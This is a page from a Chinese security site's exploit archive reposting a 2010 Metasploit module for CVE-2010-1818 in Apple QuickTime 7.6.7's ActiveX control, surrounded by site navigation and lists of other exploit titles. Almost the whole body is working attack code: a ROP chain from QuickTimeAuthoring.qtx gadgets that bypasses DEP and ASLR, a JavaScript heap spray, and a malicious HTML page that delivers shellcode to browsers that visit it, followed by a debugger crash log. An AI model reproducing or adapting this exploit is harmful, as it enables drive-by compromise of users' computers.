首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution(meta)
来源:metasploit[at]qoop.org 作者:jduck 发布时间:2010-08-31  
##
# $Id: apple_quicktime_marshaled_punk.rb 10196 2010-08-30 21:52:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Seh

	include Msf::Exploit::Remote::BrowserAutopwn
	autopwn_info({
		:os_name    => OperatingSystems::WINDOWS,
		:javascript => true,
		:rank       => NormalRanking, # reliable memory corruption
		:vuln_test  => nil,
	})

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution',
			'Description'    => %q{
					This module exploits a memory trust issue in Apple QuickTime
				7.6.7. When processing a specially-crafted HTML page, the QuickTime ActiveX
				control will treat a supplied parameter as a trusted pointer. It will
				then use it as a COM-type pUnknown and lead to arbitrary code execution.

				This exploit utilizes a combination of heap spraying and the
				QuickTimeAuthoring.qtx module to bypass DEP and ASLR. This module does not
				opt-in to ASLR. As such, this module should be reliable on all Windows
				versions.

				NOTE: The addresses may need to be adjusted for older versions of QuickTime.
			},
			'Author'         =>
				[
					'Ruben Santemarta',  # original discovery
					'jduck'              # Metasploit module
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10196 
, 'References' => [ [ 'CVE', '2010-1818' ], [ 'URL', 'http://reversemode.com/index.php?option=com_content&task=view&id=69&Itemid=1' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'AutoRunScript' => 'migrate -f', }, 'Payload' => { 'Space' => 384, # perhaps more? 'BadChars' => "", # none... 'DisableNops' => true, 'PrependEncoder' => Metasm::Shellcode.assemble(Metasm::Ia32.new, "mov esp,ebp").encode_string, # fix esp up }, 'Platform' => 'win', 'Targets' => [ [ 'Apple QuickTime Player 7.6.7', { 'Ret' => 0x677a0000, # base of QuickTimeAuthoring.qtx } ], ], 'Privileged' => false, 'DisclosureDate' => 'Aug 30 2010', 'DefaultTarget' => 0)) end def on_request_uri(client, request) return if ((p = regenerate_payload(client)) == nil) print_status("Sending #{self.name} exploit HTML to #{client.peerhost}:#{client.peerport}...") shellcode = Rex::Text.to_unescape(p.encoded) # We will spray to this address, hopefully spray_target = 0x15220c20 # This is where our happy little dll is loaded # 677a0000 679ce000 QuickTimeAuthoring C:\Program Files\QuickTime\QTSystem\QuickTimeAuthoring.qtx rop_mod_base = target.ret sploit = [ spray_target - 8, # This first piece of code points the stack pointer to our data! # NOTE: eax, ecx, and esi all point to our spray at this point. rop_mod_base + 0x79c12, # xchg eax,esp / pop edi / pop esi / ret # The second one becomes the new program counter after stack flip. rop_mod_base + 0x1e27, # pop ecx / ret rop_mod_base + 0x170088, # the IAT addr for HeapCreate (becomes ecx) # We get the address of HeapCreate from the IAT here. rop_mod_base + 0x10244, # mov eax,[ecx] / ret # Call HeapCreate to create the k-rad segment rop_mod_base + 0x509e, # call eax 0x01040110, # flOptions (gets & with 0x40005) 0x01010101, # dwInitialSize 0x01010101, # dwMaximumSize # Don't bother calling HeapAlloc, just add 0x8000 to the Heap Base # Set ebx to our adjustment rop_mod_base + 0x307a, # pop ebx / ret 0x8000, # becomes ebx # Adjust eax rop_mod_base + 0xbfb5b, # add eax,ebx / ret # Save our buffer pointer off to this address rop_mod_base + 0x1e27, # pop ecx / ret rop_mod_base + 0x2062d4, # something writable # Write eax to the address rop_mod_base + 0x8fd6, # mov [ecx], eax / ret # Now we must copy our real payload into the buffer # First, setup edi rop_mod_base + 0x134fd5, # xchg eax,edi / ret # Get ESI from EDI (which is now in EAX) rop_mod_base + 0x103ff8, # push eax / pop esi / pop ebx / ret 0x41414141, # scratch (becomes ebx) # Set ECX from the stack rop_mod_base + 0x1e27, # pop ecx / ret 0x200 / 4, # dwords to copy :) # copy it! rop_mod_base + 0x778d2, # rep movsd / pop edi / pop esi / ret 0x41414141, # scratch (becomes edi) 0x41414141, # scratch (becomes esi) # Re-load the buffer pointer address rop_mod_base + 0x1e27, # pop ecx / ret rop_mod_base + 0x2062d4, # something writable # And the pointer value itself rop_mod_base + 0x10244, # mov eax,[ecx] / ret # Set ebx to our adjustment rop_mod_base + 0x307a, # pop ebx / ret 0x42424242, # will be filled after array init # Adjust eax rop_mod_base + 0xbfb5b, # add eax,ebx / ret # Jump! rop_mod_base + 0x509e, # call eax # eh? Hopefull we didn't reach here. 0xdeadbeef ] sploit[27] = 8 + (sploit.length * 4) sploit = sploit.pack('V*') sploit << p.encoded sploit = Rex::Text.to_unescape(sploit) custom_js = <<-EOF function Prepare() { var block = unescape("#{sploit}"); while(block.length < 0x200) block += unescape("%u0000"); heap = new heapLib.ie(0x20000); while(block.length < 0x80000) block += block; finalspray = block.substring(2, 0x80000 - 0x21); for(var i = 0; i < 350; i++) { heap.alloc(finalspray); } } function start() { var obj = '<' + 'object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" height="0"'+'>' + '</'+ 'object>'; document.getElementById('stb').innerHTML = obj; Prepare(); var targ = #{spray_target}; var obj = '<' + 'object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" height="0"' + '>' + '<' + 'PARAM name="_Marshaled_pUnk" value="' + targ + '"' + '/>' + '</'+ 'object>'; document.getElementById('xpl').innerHTML = obj; } EOF hl_js = heaplib(custom_js) content = <<-EOF <html> <head> <script language="javascript"> #{hl_js} </script> </head> <body onload="start()"> <div id="stb"></div> <div id="xpl"></div> </body> </html> EOF # .. send_response(client, content, { 'Content-Type' => "text/html" }) # Handle the payload handler(client) end end =begin (7fc.a4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=15220c20 ebx=00134ca8 ecx=15220c18 edx=00134b98 esi=15220c20 edi=00134bfc eip=deadbe01 esp=00134b7c ebp=00134b90 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 deadbe01 ?? ??? =end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Safari for windows Invalid SGV
·SnackAmp 3.1.2 Malicious SMP B
·Apple QuickTime "_Marshaled_pU
·Spybot-S&D blindman.exe DLL Hi
·Mereo v1.9.2 Remote HTTP Serve
·MPLAB IDE .mcp .mcw DLL Hijack
·Windows 7 / Vista Backup Utili
·mBlogger v1.0.04 (viewpost.php
·Microsoft Internet explorer 8
·Leadtools ActiveX Common Dialo
·web wiz newspad v1.03 Database
·Adobe Acrobat Reader and Flash
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved